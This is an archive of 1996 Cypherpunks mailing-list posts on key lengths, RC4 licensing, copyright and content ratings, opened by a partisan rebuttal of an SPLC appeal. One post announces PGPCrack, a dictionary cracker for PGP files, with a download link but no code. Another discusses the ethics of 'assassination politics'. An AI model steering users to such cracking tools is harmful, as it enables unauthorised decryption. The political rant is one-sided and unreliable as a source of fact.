
>When the Army recently conducted an internal investigation to
>learn how many soldiers were involved with skinhead groups,
>senior officers at the Pentagon twice conferred with
>Wiesenthal Center officials, and when Patrick J. Buchanan was
>running for the Republican Presidential nomination, they
>produced names of Buchanan supporters who once worked for
>David Duke, a former Ku Klux Klan member, or had affiliation
>with the National Association for the Advancement of White
>People.

About 3 in all, if I recall the news reports correctly.  This "KKK people
support Buchanan so Buchanan is bad" idea is fatuous liberal propaganda.  If
one were to poll the members of North American Man-Boy Love Association, a
majority of them would probably support Clinton, because of his policy of
loosening restrictions on "alternate lifestyles."  However, I have yet to see
any demonization of Clinton on this basis anywhere. (Not that I think it
would be justified, mind you.)

BTW, if the "advancement" of people on the basis of skin color is racist,
then the NAACP, La Raza, et al, should be put out of business as well as the
KKK and the National Association for the Advancement of White People.

[B.S. snipped]

>Now, Dees and his colleagues at the Southern Poverty Law
>Center have again warned the Attorney General about the danger
>posed by the antigovernment "Patriot" movement. In an April 9,
>1996 letter, Dees urged Reno to take concrete steps to counter
>the threat of further domestic terrorism. He also provided her
>with a copy of *False Patriots*, the Center's new report on
>the "Patriot" movement. This 72-page expose is the culmination
>of a Center investigation into the "Patriot" movement
>conducted since the Oklahoma City bombing.
>
>United By Hate
>
>The "Patriot" movement encompasses numerous elements of the
>American right, from certain Christian fundamentalists to the
>Ku Klux Klan. It includes tax protesters, survivalists and
>neo-Nazis, as well as radical anti-environmentalists and gun
>enthusiasts. The tie that binds those in the movement,
>estimated by some at five million strong, is a virulent hatred
>of the federal government.

The 5 million figure is low.  The NRA had almost that many members last I
heard, and most of them are not survivalists, tax protestors, or neo-Nazis.
Gun enthusiast == virulent hatred of government?  More propaganda...

>This hatred has been fueled in recent years by the passage of
>gun control legislation, the deaths of Randy Weaver's wife and
>son at the hands of federal agents on Ruby Ridge in Idaho, and
>the disastrous federal assault on the Branch Davidian compound
>in Waco.

Shooting and burning people without a compelling reason for doing so pisses
people off, and lowers public confidence in the agencies doing the shooting
and burning.  What is so radical about that?

>The False Patriots report reveals the people behind the
>"Patriot" movement, people like Louis Beam, a key Aryan
>Nations leader, and Pete Peters, a pastor of the bizarre
>Christian Identity faith.

Beam may be a poo-bah in the Aryan Nations, but most "partiots" find his
views revolting.  This is another example of using an atypical aberration as
an excuse for demonizing an entire group.  I have yet to see a major news
organization use the Unabomber to demonize radical leftist environmental
extremists in this way, but the comparison would be far more truthful the
ones made here.

[Anti-patriot B.S. snipped]

>Since the Oklahoma City tragedy, numerous "Patriot" terrorist
>plots have been discovered, including plans to poison federal
>employees in Minnesota and conspiracies to blow up a federal
>courthouse in Spokane and an IRS building in Reno. An AmTrak
>train was derailed by a group calling itself "Sons of the
>Gestapo."

Which turned out to have been done by a disgruntled former railroad employee
who left the "sons of gestapo" note as a red herring.  Could you at least
stick to propaganda that has at least some basis in fact?

>Over ten tons of explosives have been stolen from various
>locations around the country in the past year. Authorities
>suspect a large quantity has made its way into the "Patriot"
>movement. In December, a survivalist was arrested in the Ozark
>Mountains of Arkansas and charged with terrorism. He had
>produced 130 grams of the deadly poison ricin, enough to kill
>thousands.

Explosives thefts are nothing new.  Regulation of explosive materials is.
 Explosives and poisons can be made out of commonly available materials.  If
this is such a problem, how come this country wasn't bombed and poisoned into
oblivion 50 years ago?

>Secret Cells Formed
>
>>From California to Florida, "Patriots" are forming cells of
>five to ten men skilled in explosives, sniper fire, sabotage
>and terrorism. These secret cells operate without a chain of
>command to avoid compromising the larger movement. One cell
>recently uncovered in Idaho is financed by a wealthy
>businessman. These cells, like the one McVeigh is suspected of
>forming, are difficult to monitor and can strike when least
>expected.

Another unsubstantiated insinuation that McVeigh is a
militia/patriot/skinhead type.

>What You Can Do To Help Stop Domestic Terrorism

[Snip]

>Find out if your state has anti-militia and anti-paramilitary
>training statutes. If the answer is "Yes," insist that the
>laws be enforced. If "No," urge the attorney general's office
>to work for passage of such laws.
>
>+ Support federal legislation to outlaw militia groups that
>are not authorized by state law
>
>These groups operate as a springboard for dangerous
>antigovernment activity.

Yes, throw out the second amendment.  The government can control people much
more easily when they are helpless...

>+ Learn about the "Patriot" movement and share your knowledge
>with others

Absolutely, yes, hallelujah, preach it brother!  You might want to chesk out
other sources than the SPLC, however.  The best way to find out what views an
organization holds is to directly contact the organization, rather than a
member of the opposition with an axe to grind.

>The "Patriot" movement thrives on secrecy and citizen apathy.

So does government tyranny and oppression.

[B.S. deleted]

>The Militia Task Force is leading the fight to expose the
>"Patriot" movement and protect those injured in hate crimes.
>The Center's Militia Task Force and its Klanwatch Project
>monitor "Patriot" groups, especially those with racist ties.

Yes, concentrate on the skinheads and other kooks.  That way, you can tar
everyone else with the same stick...

[SPLC fund-raising crap deleted]

>A copy of the latest official registration statement and
>financial report filed by the Souther Poverty Law Center may
>be obtained by contacting Office of Charities Registration,
>162 Washington Avenue, Albany, NY 12231.

I find it disgusting that a radical left-wing propaganda outlet like the SPLC
can legally call itself a "charity."

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Apr 1996 12:43:45 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: washington post notices archives
Message-ID: <ad96d2eb050210044ddc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 PM 4/14/96, E. ALLEN SMITH wrote:

>        In addition, what if the material is edited down to try to conform to
>fair use, as I do? First, you're still going to find it using the search
>engines - and will have to filter it out. Second, the hoster of the data, if
>locatable, will have to decide whether to respond to a legal threat and delete
>something that may be within such guidelines. Third, such guidelines may vary
>from country to country.

"Fair use" is very tricky. The Church of Scientology files lawsuits against
even those that mention that Saint Ron believed the Key to Becoming Clear
lay in communicating with plants.

And if the editors of a newspaper want to file suit, they can. In fact,
newspapers don't necessarily have more copyright rights than others do.
What if a person like me demands that an archive site remove articles by
me? I have not signed any waivers authorizing an archive site to
distribute, sell, trade, or otherwise disperse my articles! (Recall the
controversy some years back when a compilation of jokes from rec.humor.*
was sold, without compensation to the joke authors.

Changes are being proposed in copyright law. Maybe good, maybe bad. I don't
follow the controversy.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Apr 1996 11:18:15 +0800
To: Jack Mott <cypherpunks@toad.com
Subject: Re: key bit lengths
Message-ID: <ad96d54106021004da68@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:59 PM 4/14/96, Jack Mott wrote:
>In Applied Crypto, it talks about thermodynamic limitations of brute
>force attacks.  I did some calculations and it looks like it will take,
>given a perfectly effecient computer, the combined energy of 509,485,193
>average supernovas to brute force a 256 bit key. I was just wondering if
>there are any theoretical ways around this. I am just talking about
>plain brute force here, not attacking other weaknesses.

By "perfectly efficient" do you mean a computer which dissipates (uses) a
kT per logical operation? If so, then calculations are easy to do.

However, there are two theorized alternative approaches. First,
disssipationless or "reversible" computing, a la Landauer, Bennett,
Toffoli, Fredkin, Merkle, et. al. If actually feasible (and some of us are
skeptical), then computation could be done with much less energy per
logical operation than kT.

Second, quantum computation, a la Deutsch, Shor, Bennett, et. al. (Yes,
some of the same players.) See the work on quantum factoring.

As with reversible computing, the energy consumption may be vastly less
than the kT per logical operation usually considered to be the lower bound
on energy needed.

As I said, I am skeptical. Interested readers may want to track down
several references:

-- "Workshop on Physics and Computation," Proceedings, 1992, put out by the
IEEE.

-- a Santa Fe Institute publication, "Complexity, Entropy, and the Physics
of Information," ed. W. Zurek.

I have more references and discussion in my Cyphernomicon.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Apr 1996 11:14:17 +0800
To: cypherpunks@toad.com
Subject: Rot-weiler (Re: Is crypt(1) a prohibited export?)
Message-ID: <ad96d87f070210049d80@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:45 PM 4/14/96, Bill Stewart wrote:

>Actually, unless you specifically apply for permission, even rot13 isn't
>exportable.
>Unfortunately, this means it's illegal for me to make Rot13-Breaker's Workbench
>available for ftp :-)

S.Boxx made this available a couple of years ago--it was called
"Rot-weiler." But it was bit of a dog.

--Klaus







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Veeneman <system@decode.com>
Date: Mon, 15 Apr 1996 08:18:37 +0800
To: cypherpunks@toad.com
Subject: DC Cypherpunks meeting report
Message-ID: <5X9DmD1w165w@decode.com>
MIME-Version: 1.0
Content-Type: text/plain



C'punks,

  The DC Cypherpunks held their monthly meeting on April 13 at the Digex
offices, with about a dozen people attending.  The agenda was light,
with discussion ranging from ISDN in Virginia and Maryland, a security
hole in rlogin, various biometric identification methods and Dorothy
Denning's GPS ID plan.  Carl Ellison gave an overview of Cybercash, and
answered several questions.

  After the meeting, a smaller group adjourned to a local Chinese
restaurant, where most of the discussion focused on getting inexpensive
ISDN or IP connectivity between Baltimore and northern Virigina.

  No meeting date was set for May.

Dan


--
system@decode.com (Dan Veeneman)
Cryptography, Security, Privacy BBS  +1 410 730 6734   Data/FAX




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Mon, 15 Apr 1996 08:50:22 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: [Political Rant] Was: examples of mandatory content rating?
In-Reply-To: <Pine.3.89.9604141600.A8552-0100000@netcom15>
Message-ID: <Pine.3.89.9604141756.A29879-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Apr 1996, Jonathon Blake wrote:

> 
> 	Since somebody else brought up SurfWatch, remember that 
> 	it was SurfWatch that declared whitehouse.org to be 
> 	off-limits for obscene content.  A mistake on their
> 	part --- or at least that is their claim.  << This
> 	was just before CDA passed, btw.   >> << I personally
> 	thought it was a great way to demonstrate the absurdity 
> 	of CDA.  >>
> 

Alas I suspect this will be used by the CDA supporters to claim that 
ballyhooed technology to 'protect' children does not work, and that legal 
restrictions are necessary...

-----------------------------------------------------------------------
Jay Holovacs <holovacs@ios.com>
-----------------------------------------------------------------------
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Mon, 15 Apr 1996 09:12:04 +0800
To: cypherpunks@toad.com
Subject: RC4 licensening
Message-ID: <3171774B.35F3@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


Hello Cypherworld,
	Anyone know how much it costs to license RC4 or how RSA has been 
handling the whole situation?

	I finally got my Turbo C implementation to work with the DELPHI 
2.0 version, I'm pumped. Now I just have to get GCC figured out and I'll 
make the Linux version work too. yyyeeeeha.
-- 
thecrow@iconn.net
"It can't rain all the time"

RSA ENCRYPTION IN 3 LINES OF PERL
---------------------------------------------------------
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 15 Apr 1996 09:48:44 +0800
To: unicorn@schloss.li
Subject: Re: "Contempt" charges likely to increase
Message-ID: <01I3JIBPU6VW8Y5179@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 13-APR-1996 11:57:34.92

>Are you planning on affording them due process rights?

	Due Process rights are an interesting question in this regard. One,
self-defense goes up against due process, particularly lethal self defense. One
liberal justification for various bans or limits on lethal self defense (i.e.,
those against potentially lethal defense against property crimes - including
preventing the criminal from making away with his stolen property) is that the
criminal does not get due process. In such a case, it's usually reasonably
obvious to the victim that self-defense is necessary, although others (such as,
so far as I can tell, in the Goetz case) may not realize it.
	Two, who's going to apply the trial? As you've noted regarding
overturning contempt charges, judges are very rarely willing to consider each
other wrong (outside of the realm of appeals), much less sentence each other.
Another instance of how judges tend to resist even the appointed mechanisms for
removal can be found in the recent judicial commentary regarding a threatened
impeachment for another judge; while they were correct in that case, the
instance is instructive. This is a common tendency inside the government in
general; cops are very loyal to one another, even when they're crooked. Seldom
is anyone but an internal body (Internal Affairs) permitted to go after a cop
(except with massive opposition by the police department), and even they are
hated.

>How about a trial, or does it merely take a single bidder with money to have
>someone offed?

	The risk of innocents dying is a valid problem, and is the major reason
that I have not "endorsed" assasination politics. The essential question is
whether more innocents will die under such a system than do now, or under
other proposed (non-violent) alternatives. The latter would be preferable, _if_
they work. As yet, I have hopes that they will; others, such as Mr. Bell, are
more pessimistic.

>Sounds like tyrrany of the rich to me.

	Unfortunately, it isn't. I say unfortunately because a tyrrany of the
rich would be preferable to the tyrrany of the (incompetent) majority we've
got currently; even the provisions in the Bill of Rights are removable by a
super-majority. Of course, a tyrrany of no-one at all would be preferable, but
I'm not sure if there's any way to do that.

>> To whatever extent it exceeds those limits, and to 
>> whatever extent the public can't get justice to prevent those violations, 
>> why would the public be obligated to accept them?

>Really Mr. Bell has recognized something important, though I'm not sure 
>even he realizes it.  Specifically, that when his allies are so few in 
>number he must resort to general terrorism and low intensity conflict to 
>have any hope of success at all.

	This is essentially the moral problem of ends justifying the means; I
do not regard this difficulty as solvable in any provable manner.
 
>> To believe otherwise is to believe that the government has some sort of 
>> special dispensation to violate the law.  I don't believe this; it wouldn't 
>> surprise me to hear that you do, however.  Which is it?

>I don't believe anyone has any special dispensation.  It's all a question 
>of who can get away with it.  For all your moaning and whining, you are 

[irrelevant material deleted]

	Essentially, can we stop _everybody_ from getting away with it, as you
put it, or just some people? And if the latter, who should we stop?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 15 Apr 1996 10:27:28 +0800
To: tcmay@got.net
Subject: Re: washington post notices archives
Message-ID: <01I3JIIUTEUU8Y5179@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net (Timothy C. May)

>1. Expect more and more of these sorts of copyright "cease and desist" (or,
>as I like to say, "decease and cyst") orders, as newspapers and magazines
>use search engines to find their stuff. Expect some "automated searches" to
>be done routinely, even offered as services by third parties. ("Find
>infringing copies...make $1000 a week in your spare time.")

>4. Suppose the HKS archives were actually offshore, in the Cayman Islands
>or in some place that doesn't recognize copyright law in the same way most
>Western or Berne Convention countries do?

	In addition, what if the material is edited down to try to conform to
fair use, as I do? First, you're still going to find it using the search
engines - and will have to filter it out. Second, the hoster of the data, if
locatable, will have to decide whether to respond to a legal threat and delete
something that may be within such guidelines. Third, such guidelines may vary
from country to country.

>5. Suppose access to such archives is done via Web remailers, and the
>location is not easily determinable? (To be sure, lots of hits means
>traffic analysis will reveal the location....the same general problem with
>"reply-blocks," of course.)

	To what degree could a remailer sense that its remailings are getting
too predictable (susceptible to traffic analysis)? If it had some means of
doing so (without keeping enough information to make subpoenaing it a
profitable proposition), then it could do something like the random
looping-back remailer chains, on an automatic basis to the degree needed to
offset analysis.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 15 Apr 1996 10:30:56 +0800
To: alano@teleport.com
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
Message-ID: <01I3JIQVU0U48Y5179@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"alano@teleport.com"  "Alan Olsen" 14-APR-1996 00:34:14.24

>What these schemes will do is shield children from anything resembling a
>"controversial" discussion.  (I expect Cypherpunks to be labeled as "could
>cause criminal behaviour" or some such malarky by the more protective and
>clueless.  (It may be true, but why warn them upfront? ]:> ))  You will see
>the forces of "good" try and protect the little kidlets from anything that
>might get them to think for themselves.  It is already happening in some
>sectors of public thought, I expect the net to become its next victim.

	The proposed standard wants to make kid-nonavailable material on
"glorifying drug use" and gambling. In both these cases, many political
arguments on the subject (i.e., those arguing that the substances or behaviors
in question are less harmful than some suppose) would be classified as
something that parents should be able to block out.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 15 Apr 1996 10:19:53 +0800
To: unicorn@schloss.li
Subject: Re: [Political Rant] Was: examples of mandatory content rating?
Message-ID: <01I3JIYYDAEA8Y5179@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 14-APR-1996 00:37:25.93

>I tend to disagree.  Ratings are generally consumed by parents and 
>otherwise custodial entities.  The largest and richest market anywhere 
>has always been the 18-25 range, or 18-30 depending on who you talk to.  
>I don't have figures, but I think that internet users probably 
>prodominantely fall into 18-25/18-30.  This age group generally could 
>care less.  It's much easier to search by subject or key word than by 
>paying attention to ratings in any event.  There is no real market for 
>ratings.  If there were a strong market incentive for it, there would be 
>no need for government intervention, which there clearly is.  Sure some 
>schools will purchase the services, maybe some parents, but this is a 
>long leap from major market and industry making entities.

	I'm not sure if the major use for ratings may not be searching for
material that the raters don't like. I'd be interested in many things the
fundys don't like, for instance. One could even do this via one of the
"services" that mails out listings of places to be locked from kids - just
sign up one of your anonymous employees, and get the data and put it on your
anonymous web access site. Doing so - if you don't admit you've done it - may
be cheaper than doing the research yourself. Of course, you'll need to check
out each such site to make sure that it isn't a decoy that they've inserted.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 15 Apr 1996 13:03:05 +0800
To: Jack Mott <cypherpunks@toad.com
Subject: Re: RC4 licensening
Message-ID: <v02120d51ad975a9b17ff@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:08 4/14/96, Jack Mott wrote:
>Hello Cypherworld,
>        Anyone know how much it costs to license RC4 or how RSA has been
>handling the whole situation?

Who cares how much it costs to license RC4. Just use the fully compatible
freeware RS4 (I believe?) code.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 15 Apr 1996 13:11:47 +0800
To: Clemens Stiglechner <a9401816@unet.univie.ac.at>
Subject: Re: [fwd] Undeliverable Message
Message-ID: <199604150209.TAA04585@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


It's not encrypted - it's just Unix :-)
The "begin 600 attach.Z" tells you it's uuencoded, which is a way of
representing
binary data in ASCII to make it safe for mailing, and that the resulting file
is named "attach.Z".  This looks very much like something compressed with the
Unix compress program, so you can use uncompress or gunzip to uncompress it.
Inside that is a binary file, starting off with characters that look like a 
Unix "tar" archive format; there are some headers including filenames and nulls,
followed by ASCII files.  So use a tar program to unpack it.

                Bill


At 11:59 PM 4/14/96 +0200, Clemens Stiglechner <a9401816@unet.univie.ac.at>
wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>It seems that mailer-daemon@usafa.af.mil is running amok; it has
>sent 64 *different* *encrypted* messages to the Hemingway List within
>6 hours until now. I just wonder which kind of encryption _they_ might
>use. Here is the first one:
....
>begin 600 attach.Z
>M'YV0:=R,>7/&31HZ;URTF7,&@,.'$"-*G$BQHL6+&"N"V&@#!@P0`#:"B$&#
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 15 Apr 1996 10:57:20 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <Pine.SUN.3.93.960414145921.29416C-100000@eskimo.com>
Message-ID: <199604142325.TAA05683@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai writes:
> On the other hand, if you ask cryptographers what they would use if they
> were not concerned with efficiency, I think most of them would say triple
> DES.

I'd say that for most applications these days one needn't worry too
much.

Almost all my internal communications these days inside my own LAN are
encrypted. I hardly if ever notice performance issues. When I do, I
decide if I don't care about the traffic (which sometimes is the case)
and then I use RC4.

Anyway, the point is that performance shouldn't be thought of as an
issue unless you have a system built and in use and you find that it
is a bottleneck. Often you would be surprised at how little of a
bottleneck it really is.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 15 Apr 1996 10:40:26 +0800
To: Jack Mott <thecrow@iconn.net>
Subject: Re: RC4 licensening
In-Reply-To: <3171774B.35F3@iconn.net>
Message-ID: <199604142327.TAA05691@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jack Mott writes:
> 	Anyone know how much it costs to license RC4

Zero, since the thing was protected by trade secret, not patent, and
it is no longer secret. However, it appears that the name "RC4" is a
trademark and so you should probably use another name. I suggest
"arcfour", which is the name of the known RC4 compatible cipher in SSH.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Mon, 15 Apr 1996 14:44:51 +0800
To: Jack Mott <thecrow@iconn.net>
Subject: Re: key bit lengths
In-Reply-To: <31713CED.42E2@iconn.net>
Message-ID: <Pine.BSF.3.91.960414193845.21140A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> force attacks.  I did some calculations and it looks like it will take, 
> given a perfectly effecient computer, the combined energy of 509,485,193 
> average supernovas to brute force a 256 bit key. I was just wondering if 

I'd be interested to see those calculations. If 128 bit keys would require
sqr(509485193) supernovas, I think we probably don't need to go much
higher with the number of bits.  OTOH, if the feds can somehow figure out
how to convert all the matter in the solar system into energy, they might
be able to get enough energy... e=mc^2... But, there wouldn't be anywhere
to put the computers. :)

While we're exchanging calculations.... 

I've done some simple calculations myself (which have probably already
been done, but anyway...), regarding 128 bit keys, assuming a billion
(10**9) computers trying a billion keys per second... I heard it would
take an average of 6 billion years to crack a 128 bit key with those
resources, but my calculations (using GNU bc v1.02 under FreeBSD) figure
it at over 5 trillion years... 

echo "2^128 / 10^9 / 10^9 / (60 * 60 * 24 * 365.25)" | bc
10782897524556

With commas, that's 10,782,897,524,556 years. Cut that in half (for
average cracking time), it comes to 5,391,448,762,278 years. I don't know 
where I heard the 6 billion year figure, it might have been in the Wired 
Cypherpunks article, but I think I read it somewhere else as well... Is 
my calculation okay?

Similar calculation... Assume you have a 384 bit key that you want to
brute-force, and you have 10^73 computers trying 10^9 calculations per
second. (Last I heard, 10^73 is the number of particles in the universe). 

echo "2^384 / 10^73 / 10^9 / (60 * 60 * 24 * 365.25)" | bc
124857423240026108488221664

That's an impressive number. :)

As an aside, I've heard that "billion" and "trillion" are different in 
different parts of the world...

           Western   British
billion     10^9      10^12
trillion    10^12     10^18

A British friend mentioned to me that they are different... We checked
with American and British dictionaries to get those figures. AFAICS,
Canada seems to use the American system. Weird, eh? 

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Dierks <timd@consensus.com>
Date: Mon, 15 Apr 1996 18:34:04 +0800
To: Jack Mott <cypherpunks@toad.com
Subject: Re: RC4 licensening
Message-ID: <v02140b00ad977b97b135@[205.149.165.24]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:08 PM 4/14/96, Jack Mott wrote:
>    Anyone know how much it costs to license RC4 or how RSA has been
>handling the whole situation?

If, for whatever reason, you decide to license RC4 from RSA, you have two
options: you can license BSAFE from RSA, or you can license RSAREF from
Consensus Development, which will soon be available with an RC4/RC2
implementation. Costs vary.

It's my understanding that RSA has threatened legal action against anyone
shipping RC4 without a license, but I don't know of any lawsuits that have
been filed.

 - Tim Dierks

Disclaimer: I am an employee of Consensus Development.

Tim Dierks  --  timd@consensus.com  --  www.consensus.com
Head of Thing-u-ma-jig Engineering, Consensus Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Apr 1996 17:31:09 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: key bit lengths
Message-ID: <ad9713050002100436c2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:21 PM 4/14/96, Mark M. wrote:

>I doubt it.  This calculation is based on the minimum amount of energy
>needed to invert a bit.  The amount of energy is a function of the temperature,
>so a brute force attack might take much less energy several billion years
>hence, since the universe will cooled off more.  There only way for there to
>be any way around this, is if a way was found to lower the termperature to
>near absolute zero consuming a very little amount of energy, or if some way
>was found to invert a bit using less energy than is currently believed (very
>doubtfull).  Of course, if P=NP, then brute-force attacks will be pointless.

A late April Fool's joke, methinks? Arguing that in "several billion years"
the "temperature" of the universe will have anything to do with
computation....well, your physics is all wrong.

The approximate figure, kT, for the minimum energy in a conventional bit
flip, can be reduced by simple cooling. Not a problem. And what the
so-called "average temperature" of the Universe may be in, say, 10 billion
years, will not affect computation. Fusion will still occur, stars will
still burn, sunshine will still produce heat. And so on.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 15 Apr 1996 15:23:27 +0800
To: coderpunks@toad.com
Subject: PGPCrack
Message-ID: <Pine.LNX.3.92.960414212045.1225A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


[ I tried sending this a couple days ago, but apparently no mail I sent that
day ever got delivered.  My apologies if any one has already received this.
-- Mark ]

-----BEGIN PGP SIGNED MESSAGE-----

I have written a UNIX program that will brute-force crack a PGP conventionally
encrypted file using a dictionary of passphrases.  I am working on making it
possible to break secret keys also.  If you have any suggestions or bug
reports, feel free to e-mail them to me.  The URL is:

http://www.voicenet.com/~markm/pgpcrack5b.tar.gz

The MD5 hash of this file is 46aa9e37020ac2efce73d870fe1acbdc.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMW6j0LZc+sv5siulAQETGAQAnKr1n/OnWS6CpQqTQSRAJhTTCkq1zP8N
l0QZYKrvO9i3EE0uXYF88EIXludrXq2mzEZCOeh4vjF0Ym8KEc82gUdRwAfxPxTU
YxHylDI56PdvgLwRBAoBiGTaUZwajM+sEtvJaH1fYshPR7neTF+Aw3YL+cMQ/iQt
PMFKXEM9GWQ=
=fgA8
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 15 Apr 1996 13:05:41 +0800
To: perry@piermont.com
Subject: Hobsian interpretations of Snow Crash ( was No matter where you go...)
In-Reply-To: <199604132331.TAA01039@jekyll.piermont.com>
Message-ID: <199604150240.VAA17552@homeport.org>
MIME-Version: 1.0
Content-Type: text


Perry E. Metzger wrote:
| Adam Shostack writes:
| > Perry E. Metzger wrote:
| > 
| > | Adam Shostack writes:
| > | > 	Snow Crash is a book about a future in which governments are
| > | > ineffective.  Companies run things, and have complete local control.
| > | > The world has gone to hell, and as a result, life is nasty, poor,
| > | > brutish and short.  Many people do not look forward to this world.
| > | 
| > | Snow Crash is hardly scary. You have characterized it as a
| > | story where life is nasty brutish and short but that isn't the same
| > | book that I read. at all.
| > 
| > 	The CIA privatized & selling data to all comers?  An
| > unstoppable wave of illegal immigration coming to California?  Sounds
| > pretty scary to many people.  There are other readings, but that one
| > is there.
